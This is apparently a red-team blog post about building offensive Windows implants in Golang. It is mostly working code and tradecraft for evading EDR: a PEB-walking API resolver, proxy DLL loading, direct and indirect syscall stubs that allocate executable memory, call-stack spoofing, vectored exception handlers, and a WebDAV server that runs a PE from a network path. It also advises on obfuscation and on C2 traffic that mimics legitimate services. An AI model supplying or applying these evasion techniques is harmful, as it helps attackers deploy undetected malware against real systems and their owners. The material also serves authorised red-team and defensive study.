# tl;dr
Golang is no C, but its OK.
> **disclaimer:** This is a personal opinion. C-nile people please do not hurt me.
# why would anyone want to do that
This is debatable, but:
- C2 communication is *way* easier to do in Golang, which is why a lot of stage1 implants are Golang-based
- Hard*er* to reverse, but not as hard as it was before
- Loads of support and offensive projects (some referenced here)
- Loads of existing agents to customize/build off of (<3 `Merlin`)
- Faster to develop in sometimes (subjective)
I will only cover language-specific implementations. Any higher-level techniques stay the same and are out-of-scope of the post.
# API resolver
The default `sys/windows` package uses LoadLibraryW and GetProcAddress (oof). Walking the PEB is fairly easy in Go, and I have implemented an interchangeable interface for the `windows.NewLazySystemDll` set of functions in https://github.com/zimnyaa/xdvoke. Just to compare it to C, this is how you resolve a function:
```go
func (dll *ProxyDLL) NewProc(name string) (*DProc, error) {
dosHeader := (*IMAGE_DOS_HEADER)(a2p(uintptr(dll.Handle)))
if dosHeader.E_magic != IMAGE_DOS_SIGNATURE {
return nil, fmt.Errorf("Not an MS-DOS binary (provided: %x, expected: %x)", dosHeader.E_magic, IMAGE_DOS_SIGNATURE)
}
oldHeader := (*IMAGE_NT_HEADERS)(a2p(uintptr(dll.Handle) + uintptr(dosHeader.E_lfanew)))
if oldHeader.Signature != IMAGE_NT_SIGNATURE {
return nil, fmt.Errorf("Not an NT binary (provided: %x, expected: %x)", oldHeader.Signature, IMAGE_NT_SIGNATURE)
}
directory := oldHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]
if directory.Size == 0 {
return nil, fmt.Errorf("No export table found")
}
exports := (*IMAGE_EXPORT_DIRECTORY)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(directory.VirtualAddress)))
if exports.NumberOfNames == 0 || exports.NumberOfFunctions == 0 {
return nil, fmt.Errorf("No functions exported")
}
if exports.NumberOfNames == 0 {
return nil, fmt.Errorf("No functions exported by name")
}
var nameRefs []uint32
unsafeSlice(unsafe.Pointer(&nameRefs), a2p(oldHeader.OptionalHeader.ImageBase+uintptr(exports.AddressOfNames)), int(exports.NumberOfNames))
var ordinals []uint16
unsafeSlice(unsafe.Pointer(&ordinals), a2p(oldHeader.OptionalHeader.ImageBase+uintptr(exports.AddressOfNameOrdinals)), int(exports.NumberOfNames))
for i := range nameRefs {
nameArray := windows.BytePtrToString((*byte)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(nameRefs[i]))))
if nameArray == name {
nameord := ordinals[i]
funcaddr := oldHeader.OptionalHeader.ImageBase + uintptr(*(*uint32)(a2p(oldHeader.OptionalHeader.ImageBase + uintptr(exports.AddressOfFunctions) + uintptr(nameord)*4)))
return &DProc{dll, name, funcaddr}, nil
}
}
return nil, fmt.Errorf("Function not found")
}
```
As a cherry on top, I have stolen the approach from rad98 (used by a lot of people), to proxy load the DLL:
```go
modntdll, _ := NewProxyDLL("ntdll.dll")
modkernel32, _ := NewProxyDLL("kernel32.dll")
fRtlQueueWorkItem, _ := modntdll.NewProc("RtlQueueWorkItem")
fLoadLibraryW, _ := modkernel32.NewProc("LoadLibraryW")
syscall.Syscall(fRtlQueueWorkItem.Addr(), 3, uintptr(fLoadLibraryW.Addr()), uintptr(unsafe.Pointer(namep)), uintptr(0))
time.Sleep(500 * time.Millisecond)
rdll, e := windows.LoadDLL(name)
```
Omit it if you want, because Elastic checks the call stack for LoadLibrary and has a rule against `RtlQueueWorkItem` usage. It shouldn't take long for other EDRs to follow suit.
# (in)direct syscalls
Syscalls are a staple primitive of doing anything lower-level within an implant. Direct syscall implementations are ususally based on assembly stubs in the Go runtime, mainly for the reason that Golang's assembly is cryptic and is way easier to modify than write yourself.
The industry-standard implementation of that is https://github.com/C-Sto/BananaPhone/, which is a Hells Gate resolver and a syscall stub. Hell's Gate is extensively covered in a lot of places, but the syscall stub is more interesting, as it demonstrates how to adapt regular assembly to Golang:
```go
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·bpSyscall(SB), $0-56
XORQ AX,AX
MOVW callid+0(FP), AX
PUSHQ CX
//put variadic size into CX
MOVQ argh_len+16(FP),CX
//put variadic pointer into SI
MOVQ argh_base+8(FP),SI
// SetLastError(0).
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
SUBQ $(maxargs*8), SP // room for args
// Fast version, do not store args on the stack.
CMPL CX, $4
JLE loadregs
// Check we have enough room for args.
CMPL CX, $maxargs
JLE 2(PC)
INT $3 // not enough room -> crash
// Copy args to the stack.
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
loadregs:
//move the stack pointer????? why????
SUBQ $8, SP
// Load first 4 args into correspondent registers.
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
// Floating point arguments are passed in the XMM
// registers. Set them here in case any of the arguments
// are floating point values. For details see
// https://msdn.microsoft.com/en-us/library/zthk2dkh.aspx
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
//MOVW callid+0(FP), AX
MOVQ CX, R10
SYSCALL
ADDQ $((maxargs+1)*8), SP
// Return result.
POPQ CX
MOVL AX, errcode+32(FP)
RET
```
This is based off of https://golang.org/src/runtime/sys_windows_amd64.s, namely the `runtime·asmstdcall` function.
However, a direct syscall stub is something your grandpa uses to call his SSNs. Usually it is best to jump to an existing `syscall;ret`, known as indirect syscalls. There is an amazing Golang package that supports this out of the box, https://github.com/f1zm0/acheron/. Moreover, it also contains a built-in NTDLL API resolver in Golang assembly that even supports plug-in hashing functions. This is amazing:
```go
s1 := ach.HashString("NtAllocateVirtualMemory")
if retcode, err := ach.Syscall(
s1, // function name hash
hSelf, // arg1: _In_ HANDLE ProcessHandle,
uintptr(unsafe.Pointer(&baseAddr)), // arg2: _Inout_ PVOID *BaseAddress,
uintptr(unsafe.Pointer(nil)), // arg3: _In_ ULONG_PTR ZeroBits,
0x1000, // arg4: _Inout_ PSIZE_T RegionSize,
windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
windows.PAGE_EXECUTE_READWRITE, // arg6: _In_ ULONG Protect
); err != nil {
panic(err)
}
```
# call stack spoofing
While VEH is tough to deal with, the approach from
https://0xdarkvortex.dev/hiding-in-plainsight/ is still valid. It has its drawbacks, like the use of TpAllocWork getting signatured, but there are plenty of alternatives to schedule tasks in new threads, like the APC approach in https://github.com/zimnyaa/beepsyscall/tree/master
The gist of it is to create an assembly stub that will extract arguments from a given struct pointer and then directly jump to a syscall stub. By creating a task with the start address of that assembly stub, the syscall instruction is reached with a benign call stack that does not include any unbacked memory.
TL;DR for `beepsyscall`:
```j
CreateThread (Beep+offset) ->
creates alertable waiting thread ->
QueueUserAPC(shellcode stub) ->
APC executes ->
Assembly unpacks registry values from the struct ->
Assembly stub jumps to the syscall stub
```
# VEH and callback stubs
I was under the impression for a long time that Golangs runtime fucks over any Vectored Exception Handlers. However, as it turned out, only Golang-specific exceptions are caught, like division by zero, so this is still possible:
```go
func vehHandler(ep *exceptionpointers) uintptr {
fmt.Printf("ep: %+v\n", ep)
fmt.Printf("er: %+v\n", ep.record)
if ep.record.exceptioncode == _EXCEPTION_ACCESS_VIOLATION {
fmt.Printf("got _EXCEPTION_ACCESS_VIOLATION in a separate thread\n")
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
exitt := kernel32.NewProc("ExitThread")
exitt.Call(uintptr(0))
return _EXCEPTION_CONTINUE_EXECUTION // never reached
}
return _EXCEPTION_CONTINUE_SEARCH
}
func main() {
kernel32 := windows.NewLazySystemDLL("kernel32.dll")
addveh := kernel32.NewProc("AddVectoredExceptionHandler")
vehcallback := syscall.NewCallback(vehHandler)
addveh.Call(uintptr(2), vehcallback)
go syscall.SyscallN(uintptr(0), uintptr(0))
time.Sleep(1 * time.Second)
fmt.Printf("main thread is alive, but the runtime is now fucked in unforseeable ways")
}
```
Note the usage of `syscall.NewCallback`. This function returns an address of a trampoline that converts between the Windows and Golang ABI. This means that you can get a function pointer that makes a given Golang function stdcallable. This is immensely useful for callbacks, handlers, stomping, hooking and all kinds of fun things.
# reflective DLL loading
Use the `Sliver`'s memmod fork: https://github.com/moloch--/memmod. Be aware that it uses the `windows` package, which means `GetProcAddress("VirtualAlloc")`. You can even go one step further and use [[bof-lazy-loading]] to reimplement the way BOFs are handled in that C2.
# webdav
If you need WebDav locally, build off of `net/webdav`. It is very easy to spin-up a server of an in-memory file (this example runs a PE from WebDav, which is actually useless for evasion):
```go
func main() {
myfs := webdav.NewMemFS()
emptyctx := context.TODO()
file, err := myfs.OpenFile(emptyctx, "mempe.exe", os.O_WRONLY|os.OCREATE, 0755)
if err != nil {
panic(err)
}
if , err := file.Write(exe); err != nil {
file.Close()
panic(err)
}
if err := file.Close(); err != nil {
panic(err)
}
handler := &webdav.Handler{
FileSystem: myfs,
LockSystem: webdav.NewMemLS(),
}
s := &http.Server{
Addr: ":8083",
Handler: handler,
}
go func() {
time.Sleep(1 * time.Second) // yeah I can't into concurrency B)
c := exec.Command("\\192.168.0.140@8083\DavWWWRoot\mempe.exe")
c.Start()
time.Sleep(1 * time.Second)
s.Shutdown(emptyctx)
}()
s.ListenAndServe()
fmt.Println("stopped the WebDAV server.")
}
```
# networking and SOCKS
The main advantage of a Golang implant is the ease of networking. Implementing pivoting, (reverse) port forwarding, or SOCKS is much easier due to the way IO is handled in the language.
An example of how one might go about implementing reverse SOCKS over an implant that uses gRPC is provided at https://github.com/zimnyaa/grpcssh (this uses the Chisel approach to connection multiplexing -- establish an SSH connection over an arbitrary protocol and let the smart people do all the work).
# static obfuscation
Garble (https://github.com/burrowers/garble/tree/master) is king. Beware of large strings though, and obfuscate them yourself with single-pass XOR or something.
Garble has an experimental control flow flattening mode, but it requires a bunch of tinkering to get it working.
Mangle (https://github.com/Tylous/Mangle) only removes known Go IoCs, which can be useful sometimes.
# implant size
Implant size is a pain, and what you see with `garble -tiny -literals build` is what you get. Sometimes you can cut down on it, but not by much.
Consider using stagers or file loaders to avoid having a 15 MB high-entropy blob.
# C2 communication
Anything is possible, as Golang is a language of servers and clients. Complex HTTP (`merlin`), gRPC over most anything (`sliver`), wireguard (as it is written in Go) are all viable options. If implemented correctly, networking will be blazing-fast as well. As Go is the perfect language for a teamserver, this further simplifies things by allowing you to reuse code/libraries both on the implant-side and the client-side.
In general, I would recommend making all C2 protocols implement `net.Conn`. After that, layering encryption and message transport over it becomes very simple and universal.
My way to implement this would be the following:
- C2 protocol that mimics legitimate traffic and a `net.Conn` interface over it (obfuscated HTTP/S, websockets, reliable UDP, VPNs like wireguard, WebRTC, public file sharing services, etc)
- Intermediate encryption layer (mTLS or Noise Protocol Framework)
- Message layer (JSON, XML, protobuf, length-prefixed structs, etc.)
# everything else
Everything else should be pretty much the same. I advise taking a look at the source code for `runtime` and `sys/windows` for reference. This should cover most of the lower-level language-specific implementations.